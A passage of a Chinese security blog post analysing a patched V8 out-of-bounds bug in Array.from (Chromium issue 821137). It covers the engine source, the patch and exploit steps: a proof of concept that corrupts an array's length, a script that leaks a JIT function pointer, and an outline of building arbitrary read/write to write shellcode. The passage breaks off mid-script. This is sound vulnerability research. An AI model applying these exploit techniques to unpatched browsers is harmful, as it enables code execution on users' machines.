<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.7.1 -->
<title>V8漏洞分析 - BUG-821137 Array.from OOB | wnagzihxa1n’s blog</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="V8漏洞分析 - BUG-821137 Array.from OOB" />
<meta name="author" content="wnagzihxa1n" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Issue 821137: OOB read/write using Array.prototype.from https://bugs.chromium.org/p/chromium/issues/detail?id=821137" />
<meta property="og:description" content="Issue 821137: OOB read/write using Array.prototype.from https://bugs.chromium.org/p/chromium/issues/detail?id=821137" />
<link rel="canonical" href="http://localhost:4000/2019/04/16/BUG-821137-Array.from-OOB.html" />
<meta property="og:url" content="http://localhost:4000/2019/04/16/BUG-821137-Array.from-OOB.html" />
<meta property="og:site_name" content="wnagzihxa1n’s blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2019-04-16T20:40:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="V8漏洞分析 - BUG-821137 Array.from OOB" />
<script type="application/ld+json">
{"author":{"@type":"Person","name":"wnagzihxa1n"},"headline":"V8漏洞分析 - BUG-821137 Array.from OOB","dateModified":"2019-04-16T20:40:00+08:00","@type":"BlogPosting","description":"Issue 821137: OOB read/write using Array.prototype.from https://bugs.chromium.org/p/chromium/issues/detail?id=821137","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2019/04/16/BUG-821137-Array.from-OOB.html"},"datePublished":"2019-04-16T20:40:00+08:00","url":"http://localhost:4000/2019/04/16/BUG-821137-Array.from-OOB.html","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="wnagzihxa1n's blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">wnagzihxa1n&#39;s blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color-cyan-hover" href="https://twitter.com/wnagzihxa1n"><i class="fab fa-twitter-square"></i></a><a class="color-purple-hover" href="https://github.com/wnagzihxa1n"><i class="fab fa-github-square"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    <!-- 
        <img src="/assets/HeadIcon.jpg" class="author-avatar" alt="Avatar" />
     -->
I am wnagzihxa1n, an unknown iOS/Android security researcher, this blog is my security study notes, just share something interesting.

</div>


<div class="post">
  <h1 class="post-title">V8漏洞分析 - BUG-821137 Array.from OOB</h1>
  
  <div class="post-tags">
      
      <a class="tag" href="/tag/browser_security/">browser_security</a>
      
  </div>
  
  <div class="post-date">Published on 16 Apr 2019</div>
  
  <p>Issue 821137: OOB read/write using Array.prototype.from</p>
<ul>
  <li>https://bugs.chromium.org/p/chromium/issues/detail?id=821137</li>
</ul>

<p>Poc</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let oobArray = [];
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        max : 1024 * 1024 * 8,
        next() {
            let result = this.counter++;
            if (this.counter == this.max) {
                oobArray.length = 0;
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) });
oobArray[oobArray.length - 1] = 0x41414141;
</code></pre></div></div>

<p>搞V8也有段时间了，网上的资料说多不多，说少也不少，很多很基础的东西我都是尽量自己去搜，我觉得搞V8的一个很关键的点在于如何把Poc在V8里的<strong>执行过程</strong>对应上</p>

<p>今天我们拿一个品相不错的洞来分析</p>
<ul>
  <li>https://chromium.googlesource.com/v8/v8.git/+/b5da57a06de8791693c248b7aafc734861a3785d%5E%21/</li>
</ul>

<p>拿到parent的hash</p>

<p><img src="/assets/resources/40C2FF1E7B4E6325CBB12C69AC01B976.jpg" alt="IMAGE" /></p>

<p>我们下载好源码之后，切换到漏洞commit</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>v8 git:(master) ✗ git reset --hard 1dab065bb4025bdd663ba12e2e976c34c3fa6599
Checking out files: 100% (5182/5182), done.
HEAD is now at 1dab065bb4 [errors] Give a more informative error message for `new Map(1)`
</code></pre></div></div>

<p>然后用工具打开分析源码，不要在意为什么我定位在这里</p>

<p><img src="/assets/resources/AB2B5509D484EC92B117BD84D0580EA8.jpg" alt="IMAGE" /></p>

<p>在V8里，会有一些常用函数会被<code class="language-plaintext highlighter-rouge">builtin</code>，路径在<code class="language-plaintext highlighter-rouge">v8/src/builtins/</code>下，我们以上图里的函数为例，这段代码所在文件为<code class="language-plaintext highlighter-rouge">v8/src/builtins/builtins-array-gen.cc</code>，这是一种DSL，全名为：<code class="language-plaintext highlighter-rouge">Domain-Specific Language</code>，领域特定语言</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// ES #sec-array.from
TF_BUILTIN(ArrayFrom, ArrayPopulatorAssembler) {
    TNode&lt;Context&gt; context = CAST(Parameter(BuiltinDescriptor::kContext));
    TNode&lt;Int32T&gt; argc = UncheckedCast&lt;Int32T&gt;(Parameter(BuiltinDescriptor::kArgumentsCount));

    CodeStubArguments args(this, ChangeInt32ToIntPtr(argc));

    // 获取map_function
    TNode&lt;Object&gt; map_function = args.GetOptionalArgumentValue(1);

    // If map_function is not undefined, then ensure it's callable else throw.
    {
        // 创建label分支用于跳转
        Label no_error(this), error(this);
        // 如果未定义则跳到no_error分支
        GotoIf(IsUndefined(map_function), &amp;no_error);
        // 如果是Smi类型则跳到error分支，这里涉及到了对象的存储，后面会写，简单来说指针类型最后一位是1
        GotoIf(TaggedIsSmi(map_function), &amp;error);
        // 分支，map_function可调用跳到no_error，不可调用跳到error
        Branch(IsCallable(map_function), &amp;no_error, &amp;error);

        // error分支
        BIND(&amp;error);
        // 抛出异常
        ThrowTypeError(context, MessageTemplate::kCalledNonCallable, map_function);

        // no_error分支
        BIND(&amp;no_error);
    }

    // 创建是否可迭代分支
    Label iterable(this), not_iterable(this), finished(this), if_exception(this);

    TNode&lt;Object&gt; this_arg = args.GetOptionalArgumentValue(2);
    TNode&lt;Object&gt; items = args.GetOptionalArgumentValue(0);
    // The spec doesn't require ToObject to be called directly on the iterable
    // branch, but it's part of GetMethod that is in the spec.
    TNode&lt;JSReceiver&gt; array_like = ToObject(context, items);

    TVARIABLE(Object, array);
    TVARIABLE(Number, length);
</code></pre></div></div>

<p>这段代码为一种叫作<code class="language-plaintext highlighter-rouge">CodeStubAssembler</code>的DSL，V8官方博客有对这种语言的使用介绍</p>
<ul>
  <li>https://v8.dev/blog/csa</li>
</ul>

<p>我们可以读一下这段代码，其实挺简单的，注释我都写好了</p>

<p>在理解了<code class="language-plaintext highlighter-rouge">CodeStubAssembler</code>大概的语法之后</p>

<p>我们可以开始讲今天的漏洞</p>

<p>首先来看Poc，先创建了一个数组，然后对这个数组做<code class="language-plaintext highlighter-rouge">Array.from()</code>调用，里面重新定义了迭代函数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let oobArray = [];
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        max : 1024 * 1024 * 8,
        next() {
            let result = this.counter++;
            if (this.counter == this.max) {
                oobArray.length = 0;
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) });
oobArray[oobArray.length - 1] = 0x41414141;
</code></pre></div></div>

<p>我们来看这个函数的定义</p>
<ul>
  <li>https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Array/from</li>
</ul>

<p><img src="/assets/resources/9A0BF36012310FF93E5791C3AB5B2A10.jpg" alt="IMAGE" /></p>

<p>也就是说，当我们传进去一个数组，它会再创建一个新的数组返回，并不会影响原来的数组</p>

<p>来看代码，可以看到不会修改传入的数组</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let array = [1, 2, 3];
let result = Array.from(array, x =&gt; x + x);
console.log(array);
console.log(result);

&gt; Array [1, 2, 3]
&gt; Array [2, 4, 6]
</code></pre></div></div>

<p>但是按照Poc里的写法，就可以对原有数组做修改，成功改掉了传入的数组</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let array = [1, 2, 3];
Array.from.call(function() { return array }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        max : 10,
        next() {
            let result = this.counter++;
            if (this.counter == this.max) {
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) });
console.log(array);

&gt; Array [0, 1, 2, 3, 4, 5, 6, 7, 8]
</code></pre></div></div>

<p>换句话来说，我们CSA代码里，改的也是传入的数组本身，感慨JS还是要深入学习，不然这种特性我是肯定想不到的</p>

<p>这也解释了为什么我们传入的第一个参数是<code class="language-plaintext highlighter-rouge">function() { return array }</code>这样的写法而不是直接传入一个数组变量</p>

<p>第二个参数涉及到了迭代的问题，大概的语法可以看出来，主要是实现<code class="language-plaintext highlighter-rouge">next()</code>函数，这里的逻辑是循环<code class="language-plaintext highlighter-rouge">max</code>次，把<code class="language-plaintext highlighter-rouge">counter++</code>作为返回值，注意看两个<code class="language-plaintext highlighter-rouge">return</code>，<code class="language-plaintext highlighter-rouge">done</code>为<code class="language-plaintext highlighter-rouge">true</code>表示迭代完成，这里由<code class="language-plaintext highlighter-rouge">this.counter == this.max</code>判断，注意我们现在是在重写迭代函数，所以可以随意写迭代逻辑和迭代次数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        max : 10,
        next() {
            let result = this.counter++;
            if (this.counter == this.max) {
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) }
</code></pre></div></div>

<p>再来看Poc，我们先创建了一个数组<code class="language-plaintext highlighter-rouge">oobArray</code>，之后的写法我们上面解释过，迭代次数为<code class="language-plaintext highlighter-rouge">1024 * 1024 * 8</code>，唯一不同的是我们在迭代结束后，改掉了数组的长度</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let oobArray = [];
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        max : 1024 * 1024 * 8,
        next() {
            let result = this.counter++;
            if (this.counter == this.max) {
                oobArray.length = 0;
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) });
oobArray[oobArray.length - 1] = 0x41414141;
</code></pre></div></div>

<p>我们来思考下，在迭代里把数组的长度改为0或者说进行修改，会发生什么</p>

<p>这需要开始看源码</p>

<p>对应的源码就是我们刚刚看的那一段，JS里一部分数组操作写进了<code class="language-plaintext highlighter-rouge">builtins</code>，可以通过命名观察到，或者函数开头命名也行</p>

<p>这里贴出了整个函数的代码，前面一部分我们已经分析过</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// ES #sec-array.from
TF_BUILTIN(ArrayFrom, ArrayPopulatorAssembler) {
  TNode&lt;Context&gt; context = CAST(Parameter(BuiltinDescriptor::kContext));
  TNode&lt;Int32T&gt; argc =
      UncheckedCast&lt;Int32T&gt;(Parameter(BuiltinDescriptor::kArgumentsCount));

  CodeStubArguments args(this, ChangeInt32ToIntPtr(argc));

  TNode&lt;Object&gt; map_function = args.GetOptionalArgumentValue(1);

  // If map_function is not undefined, then ensure it's callable else throw.
  {
    Label no_error(this), error(this);
    GotoIf(IsUndefined(map_function), &amp;no_error);
    GotoIf(TaggedIsSmi(map_function), &amp;error);
    Branch(IsCallable(map_function), &amp;no_error, &amp;error);

    BIND(&amp;error);
    ThrowTypeError(context, MessageTemplate::kCalledNonCallable, map_function);

    // 跳到这里
    BIND(&amp;no_error);
  }

  // 创建是否可迭代分支
  Label iterable(this), not_iterable(this), finished(this), if_exception(this);

  TNode&lt;Object&gt; this_arg = args.GetOptionalArgumentValue(2);
  TNode&lt;Object&gt; items = args.GetOptionalArgumentValue(0);
  // The spec doesn't require ToObject to be called directly on the iterable
  // branch, but it's part of GetMethod that is in the spec.
  TNode&lt;JSReceiver&gt; array_like = ToObject(context, items);

  TVARIABLE(Object, array);
  TVARIABLE(Number, length);

  // Determine whether items[Symbol.iterator] is defined:
  IteratorBuiltinsAssembler iterator_assembler(state());
  Node* iterator_method =
      iterator_assembler.GetIteratorMethod(context, array_like);
  Branch(IsNullOrUndefined(iterator_method), &amp;not_iterable, &amp;iterable);

  // 可迭代，或者说有迭代函数
  BIND(&amp;iterable);
  {
    TVARIABLE(Number, index, SmiConstant(0));
    TVARIABLE(Object, var_exception);
    Label loop(this, &amp;index), loop_done(this),
        on_exception(this, Label::kDeferred),
        index_overflow(this, Label::kDeferred);

    // Check that the method is callable.
    {
      Label get_method_not_callable(this, Label::kDeferred), next(this);
      GotoIf(TaggedIsSmi(iterator_method), &amp;get_method_not_callable);
      GotoIfNot(IsCallable(iterator_method), &amp;get_method_not_callable);
      Goto(&amp;next);

      BIND(&amp;get_method_not_callable);
      ThrowTypeError(context, MessageTemplate::kCalledNonCallable,
                     iterator_method);

      BIND(&amp;next);
    }

    // 创建输出数组，也就是一开始我们看到的result数组，用于保存迭代结果，此时为空
    // 由于我们的骚操作，此时就是传入的数组本身
    // Construct the output array with empty length.
    array = ConstructArrayLike(context, args.GetReceiver());

    // Actually get the iterator and throw if the iterator method does not yield
    // one.
    IteratorRecord iterator_record =
        iterator_assembler.GetIterator(context, items, iterator_method);

    TNode&lt;Context&gt; native_context = LoadNativeContext(context);
    TNode&lt;Object&gt; fast_iterator_result_map =
        LoadContextElement(native_context, Context::ITERATOR_RESULT_MAP_INDEX);

    Goto(&amp;loop);

    // 开始迭代
    BIND(&amp;loop);
    {
      // Loop while iterator is not done.
      TNode&lt;Object&gt; next = CAST(iterator_assembler.IteratorStep(
          context, iterator_record, &amp;loop_done, fast_iterator_result_map));
      TVARIABLE(Object, value,
                CAST(iterator_assembler.IteratorValue(
                    context, next, fast_iterator_result_map)));

      // If a map_function is supplied then call it (using this_arg as
      // receiver), on the value returned from the iterator. Exceptions are
      // caught so the iterator can be closed.
      {
        Label next(this);
        GotoIf(IsUndefined(map_function), &amp;next);

        CSA_ASSERT(this, IsCallable(map_function));
        Node* v = CallJS(CodeFactory::Call(isolate()), context, map_function,
                         this_arg, value.value(), index.value());
        GotoIfException(v, &amp;on_exception, &amp;var_exception);
        value = CAST(v);
        Goto(&amp;next);
        BIND(&amp;next);
      }

      // Store the result in the output object (catching any exceptions so the
      // iterator can be closed).
      Node* define_status =
          CallRuntime(Runtime::kCreateDataProperty, context, array.value(),
                      index.value(), value.value());
      GotoIfException(define_status, &amp;on_exception, &amp;var_exception);

      index = NumberInc(index.value());

      // The spec requires that we throw an exception if index reaches 2^53-1,
      // but an empty loop would take &gt;100 days to do this many iterations. To
      // actually run for that long would require an iterator that never set
      // done to true and a target array which somehow never ran out of memory,
      // e.g. a proxy that discarded the values. Ignoring this case just means
      // we would repeatedly call CreateDataProperty with index = 2^53.
      CSA_ASSERT_BRANCH(this, [&amp;](Label* ok, Label* not_ok) {
        BranchIfNumberRelationalComparison(Operation::kLessThan, index.value(),
                                           NumberConstant(kMaxSafeInteger), ok,
                                           not_ok);
      });
      Goto(&amp;loop);
    }

    // 迭代结束
    BIND(&amp;loop_done);
    {
      length = index; // index为迭代次数，也就是输出数组的length
      Goto(&amp;finished); // 跳转到finished分支
    }

    BIND(&amp;on_exception);
    {
      // Close the iterator, rethrowing either the passed exception or
      // exceptions thrown during the close.
      iterator_assembler.IteratorCloseOnException(context, iterator_record,
                                                  &amp;var_exception);
    }
  }
  
  // 不可迭代或者没有迭代函数分支
  // Since there's no iterator, items cannot be a Fast JS Array.
  BIND(&amp;not_iterable);
  {
    ......
  }

  // 迭代结束跳到这里
  BIND(&amp;finished);

  // 设置输出数组的长度
  // Finally set the length on the output and return it.
  GenerateSetLength(context, array.value(), length.value());
  args.PopAndReturn(array.value());
}
</code></pre></div></div>

<p>对于代码里构造输出数组时我说就是传入的数组本身这个问题，我们可以验证一下，我们创建一个简单的数组，里面就一个元素，第一次迭代，进入else分支，此时还没有返回，所以输出的是原始数组，第二次迭代，此时第一次迭代的数据已经写进去，所以第一位被改掉为0，之后同理</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>let array = [1];
Array.from.call(function() { return array }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        max : 10,
        next() {
            let result = this.counter++;
            if (this.counter == this.max) {
                return {done: true};
            } else {
                console.log(array);
                return {value: result, done: false};
            }
        }
    }
) });
console.log(array);

&gt; Array [1]
&gt; Array [0]
&gt; Array [0, 1]
&gt; Array [0, 1, 2]
&gt; Array [0, 1, 2, 3]
&gt; Array [0, 1, 2, 3, 4]
&gt; Array [0, 1, 2, 3, 4, 5]
&gt; Array [0, 1, 2, 3, 4, 5, 6]
&gt; Array [0, 1, 2, 3, 4, 5, 6, 7]
&gt; Array [0, 1, 2, 3, 4, 5, 6, 7, 8]
</code></pre></div></div>

<p>所以如果我们传入的是<code class="language-plaintext highlighter-rouge">[1, 2, 3]</code>，就会输出如下的数据</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt; Array [1, 2, 3]
&gt; Array [0, 2, 3]
&gt; Array [0, 1, 3]
&gt; Array [0, 1, 2]
&gt; Array [0, 1, 2, 3]
&gt; Array [0, 1, 2, 3, 4]
&gt; Array [0, 1, 2, 3, 4, 5]
&gt; Array [0, 1, 2, 3, 4, 5, 6]
&gt; Array [0, 1, 2, 3, 4, 5, 6, 7]
&gt; Array [0, 1, 2, 3, 4, 5, 6, 7, 8]
</code></pre></div></div>

<p>再回到源码，我们看到最后有一个函数<code class="language-plaintext highlighter-rouge">GenerateSetLength()</code>用于设置输出函数的长度</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// 迭代结束跳到这里
BIND(&amp;finished);

// 设置输出数组的长度
// Finally set the length on the output and return it.
GenerateSetLength(context, array.value(), length.value());
args.PopAndReturn(array.value());
</code></pre></div></div>

<p>确定该函数三个参数：</p>
<ul>
  <li>第一个参数是运行环境上下文<code class="language-plaintext highlighter-rouge">context</code></li>
  <li>第二个参数是已经被修改的原始数组</li>
  <li>第三个参数是迭代次数，以我们目前的Poc为标准就是<code class="language-plaintext highlighter-rouge">1024 * 1024 * 8</code></li>
</ul>

<p>跟入该函数，进入<code class="language-plaintext highlighter-rouge">fast</code>那个分支</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void GenerateSetLength(TNode&lt;Context&gt; context, TNode&lt;Object&gt; array,
                         TNode&lt;Number&gt; length) {
    Label fast(this), runtime(this), done(this);
    // Only set the length in this stub if
    // 1) the array has fast elements,
    // 2) the length is writable,
    // 3) the new length is greater than or equal to the old length.

    // 1) Check that the array has fast elements.
    // TODO(delphick): Consider changing this since it does an an unnecessary
    // check for SMIs.
    // TODO(delphick): Also we could hoist this to after the array construction
    // and copy the args into array in the same way as the Array constructor.
    BranchIfFastJSArray(array, context, &amp;fast, &amp;runtime);

    BIND(&amp;fast);
    {
      // 进入这里，获取数组为fast_array
      // [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
      TNode&lt;JSArray&gt; fast_array = CAST(array);

      // 迭代的次数，注意，是迭代的次数：1024 * 1024 * 8
      TNode&lt;Smi&gt; length_smi = CAST(length);
      // 这里获取的是该数组自己的长度，结合Poc来看，这里已经被改为0了
      // 有一点需要注意，因为我们是在JS代码里将数组长度改为0，这是正规操作
      // 也就是说，我们在迭代结束的时候，修改了数组长度，由引擎来做的操作，数组是会缩小的
      // 假如原来有100个长度，我们迭代结束后，改为10个，那么这个数组就只剩10个长度
      // 第11个开始就是其它对象的数据
      // 所以old_length的值取决于我们最后设置的值
      TNode&lt;Smi&gt; old_length = LoadFastJSArrayLength(fast_array);
      CSA_ASSERT(this, TaggedIsPositiveSmi(old_length));

      // 2) Ensure that the length is writable.
      // TODO(delphick): This check may be redundant due to the
      // BranchIfFastJSArray above.
      EnsureArrayLengthWritable(LoadMap(fast_array), &amp;runtime);

      // 3) If the created array already has a length greater than required,
      //    then use the runtime to set the property as that will insert holes
      //    into the excess elements and/or shrink the backing store.
      // 如果length_smi小于old_length就跳去runtime分支执行动态修改数组长度操作
      // 也就是迭代的次数小于传入数组的长度，假如我传入一个100长度的数组，但是只迭代了5个
      // 但是我生成的数组长度还是100，所以需要优化长度
      // 作者的想法：如果等于就直接把迭代次数写入，也就是说迭代次数等于数组长度
      // 可是作者没有想到，如果迭代完，传入数组长度被修改
      // 估计作者更没有想到传入的会是初始数组本身
      // 如同我们这里的数据，迭代次数length_smi为1024 * 1024 * 8，但是old_length迭代完被改为0或者很小的数据
      // 这就造成了内存里，一个长度为很小的数据的数组的长度字段被直接覆写为很大的值（取决于迭代次数）
      // 此时拥有了一个非常好用的越界读写
      GotoIf(SmiLessThan(length_smi, old_length), &amp;runtime);

      StoreObjectFieldNoWriteBarrier(fast_array, JSArray::kLengthOffset,
                                     length_smi);

      Goto(&amp;done);
    }

    BIND(&amp;runtime);
    {
      CallRuntime(Runtime::kSetProperty, context, static_cast&lt;Node*&gt;(array),
                  CodeStubAssembler::LengthStringConstant(), length,
                  SmiConstant(LanguageMode::kStrict));
      Goto(&amp;done);
    }

    BIND(&amp;done);
}
</code></pre></div></div>

<p>我们来看补丁，如果迭代次数和数组长度不等，就跳到<code class="language-plaintext highlighter-rouge">runtime</code>分支</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-      // 3) If the created array already has a length greater than required,
+      // 3) If the created array's length does not match the required length,
       //    then use the runtime to set the property as that will insert holes
-      //    into the excess elements and/or shrink the backing store.
-      GotoIf(SmiLessThan(length_smi, old_length), &amp;runtime);
+      //    into excess elements or shrink the backing store as appropriate.
+      GotoIf(SmiNotEqual(length_smi, old_length), &amp;runtime);
</code></pre></div></div>

<p>漏洞原因分析就到此为止了，接下来我们来分析如何进行漏洞利用</p>

<p>这里学习下V8数组对象的内存结构</p>

<p>常规的Array对象，它由四个字段组成，第一个字段是Map，第三个字段是指向一个FixedArray的指针，这个FixedArray存储着真正的数据，当然<code class="language-plaintext highlighter-rouge">Elem[0]......</code>存储的是数据还是指针就不一定了</p>

<p><img src="/assets/resources/FDE6A78FF2BD3FCDE4E694A21DBB9F10.jpg" alt="IMAGE" /></p>

<p>那么我们知道内存里有一个可以越界读写的数组，那么这个数组能读写到哪些东西呢？</p>

<p>我们来做个测试，如下我们修改Poc，在最前面定义一个数组对象<code class="language-plaintext highlighter-rouge">objs</code>，同时为了防止我们的<code class="language-plaintext highlighter-rouge">oobArray</code>被回收掉，将长度改为<code class="language-plaintext highlighter-rouge">5</code>，并且在迭代结束之后往<code class="language-plaintext highlighter-rouge">objs</code>加100个对象，每个对象里面写上我们要泄漏的数据，然后利用越界读去暴搜，这里我们将要泄漏的对象写为函数指针</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function func_to_overwrite() {
    let sum = 0;
    for (let i = 0;i &lt; 0x100; i++) {
        sum += i;
    }
    return sum;
}

for (let i = 0; i &lt; 1000; i++) {
    func_to_overwrite();
}

console.log("======&gt; func_to_overwrite");
%DebugPrint(func_to_overwrite);

let maxSize = 1024 * 8;
let objs = [];
let oobArray = [1.1];
Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ =&gt; (
    {
        counter : 0,
        next() {
            let result = this.counter++;
            if (this.counter == maxSize) {
                oobArray.length = 5;
                for (let i = 0; i &lt; 100; i++) {
                    let obj = {'a': 0x4321, 'b': func_to_overwrite};
                    objs.push(obj);
                }
                return {done: true};
            } else {
                return {value: result, done: false};
            }
        }
    }
) });

let jit_func_obj_ptr = 0;
for (let i = 0; i &lt; maxSize; i++) {
    let val = Int64.fromDouble(oobArray[i]);
    if (val == 0x432100000000) {
        console.log('Found', i);
        jit_func_obj_ptr = Int64.fromDouble(oobArray[i + 1]) - 1;
        console.log('JIT Function Pointer: 0x' + jit_func_obj_ptr.toString(16));
        break;
    }
}

console.log("======&gt; objs");
%DebugPrint(objs);

console.log("======&gt; oobArray");
%DebugPrint(oobArray);
</code></pre></div></div>

<p>输出如下，可以看到我们搜到的函数指针和调试打印出来的函数指针一样</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜  gn git:(1dab065bb4) ✗ ./d8 --allow-natives-syntax Poc.js     
======&gt; func_to_overwrite
DebugPrint: 0x228b18b298d9: [Function] in OldSpace
 - map: 0x228be2d02519 &lt;Map(HOLEY_ELEMENTS)&gt; [FastProperties]
 - prototype: 0x228b18b04611 &lt;JSFunction (sfi = 0x228b52305559)&gt;
 - elements: 0x228b52302251 &lt;FixedArray[0]&gt; [HOLEY_ELEMENTS]
 - function prototype: 
 - initial_map: 
 - shared_info: 0x228b18b282e1 &lt;SharedFunctionInfo func_to_overwrite&gt;
 - name: 0x228b18b27591 &lt;String[17]: func_to_overwrite&gt;
 - formal_parameter_count: 0
 - kind: NormalFunction
 - context: 0x228b18b29489 &lt;FixedArray[9]&gt;
 - code: 0x1af9bdb5f041 &lt;Code OPTIMIZED_FUNCTION&gt;
 - source code: () {
    let sum = 0;
    for (let i = 0;i &lt; 0x100; i++) {
        sum += i;
    }
    return sum;
}

Found 258
JIT Function Pointer: 0x228b18b298d8

======&gt; objs
DebugPrint: 0x228b31286141: [JSArray]
 - map: 0x228be2d02729 &lt;Map(PACKED_ELEMENTS)&gt; [FastProperties]
 - prototype: 0x228b18b05539 &lt;JSArray[0]&gt;
 - elements: 0x228b31294051 &lt;FixedArray[140]&gt; [PACKED_ELEMENTS]
 - length: 100
 - properties: 0x228b52302251 &lt;FixedArray[0]&gt; {
    #length: 0x228b5234ff89 &lt;AccessorInfo&gt; (const accessor descriptor)
 }
 - elements: 0x228b31294051 &lt;FixedArray[140]&gt; {
           0: 0x228b31294821 &lt;Object map = 0x228be2d0da99&gt;
           1: 0x228b31294849 &lt;Object map = 0x228be2d0da99&gt;
           2: 0x228b31294871 &lt;Object map = 0x228be2d0da99&gt;

            ......
            
          97: 0x228b31295749 &lt;Object map = 0x228be2d0da99&gt;
          98: 0x228b31295771 &lt;Object map = 0x228be2d0da99&gt;
          99: 0x228b31295799 &lt;Object map = 0x228be2d0da99&gt;
     100-139: 0x228b52302321 &lt;the_hole&gt;
 }

======&gt; oobArray
DebugPrint: 0x228b31286161: [JSArray]
 - map: 0x228be2d02679 &lt;Map(PACKED_DOUBLE_ELEMENTS)&gt; [FastProperties]
 - prototype: 0x228b18b05539 &lt;JSArray[0]&gt;
 - elements: 0x228b31294019 &lt;FixedDoubleArray[5]&gt; [PACKED_DOUBLE_ELEMENTS]
 - length: 8191
 - properties: 0x228b52302251 &lt;FixedArray[0]&gt; {
    #length: 0x228b5234ff89 &lt;AccessorInfo&gt; (const accessor descriptor)
 }
 - elements: 0x228b31294019 &lt;FixedDoubleArray[5]&gt; {
           0: 0
           1: 1
           2: 2
           3: 3
           4: 4
 }
</code></pre></div></div>

<p>那么现在可以泄漏出函数指针了，但是为什么我们要泄漏出函数指针呢？</p>

<p>我们来看V8里函数对象的内存结构，在其偏移为<code class="language-plaintext highlighter-rouge">0x30</code>的位置为<code class="language-plaintext highlighter-rouge">Code</code>字段，该指针加上<code class="language-plaintext highlighter-rouge">0x5F</code>的偏移为该函数JIT代码，所以如果我们泄漏出该函数指针，加上<code class="language-plaintext highlighter-rouge">0x30</code>的偏移，读到<code class="language-plaintext highlighter-rouge">Code</code>字段的值，再利用一个任意读原语，就可以读到JIT代码的指针，然后利用任意写原语，把ShellCode写进去，这样当我们调用这个函数的时候，就会执行我们的ShellCode</p>

<p><img src="/assets/resources/27F2B1E1CCF6F2108FA57ECDA9625E51.jpg" alt="IMAGE" /></p>

<p>我们现在拥有的能力是读到<code class="language-plaintext highlighter-rouge">Code</code>字段的值，但是我们需要读<code class="language-plaintext highlighter-rouge">Code+0x5F</code>的值，那么如何构造任意读和任意写的原语呢？</p>

<p>这里要提到另一种数组TypedArray，比如uint8Array，uint32Array之类的，它有一个<code class="language-plaintext highlighter-rouge">ArrayBuffer</code>字段，这种数组的真实数据存储在<code class="language-plaintext highlighter-rouge">ArrayBuffer</code>字段指向的<code class="language-plaintext highlighter-rouge">Backing Store</code>字段指向的内存</p>

<p><img src="/assets/resources/A3F2D443428D4E57BAFA840DFF68097D.jpg" alt="IMAGE" /></p>

<p>我们如果可以修改掉ArrayBuffer的<code class="language-plaintext highlighter-rouge">Backing Store</code>，那么我们对ArrayBuffer的操作，就可以变成对任意有权限读写的地址的操作</p>

<p>如下修改Poc，我们在迭代结束后，在内存里加入一百个ArrayBuffer对象，然后对后面的内存进行暴搜，标志位是长度<code class="language-plaintext highlighter-rouge">0x1234</code>，然后我们将长度位改为<code class="language-plaintext highlighter-rouge">0x1212</code>用于标记是哪个ArrayBuffer被修改</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function func_to_overwrite() {
    let sum = 0;
    for (let i = 0;i &lt; 0x100; i++) {
        sum += i;
    }
    return sum;
}

for (let i = 0; i &lt; 1000; i++) {
    func_to_overwrite();
}

console.log("======&gt; func_to_overwrite");
%DebugPrint(func_to_overwrite);

let maxSize = 1024 * 8;
let bufs = [];
let objs = [];
let oobArray = [1.1];
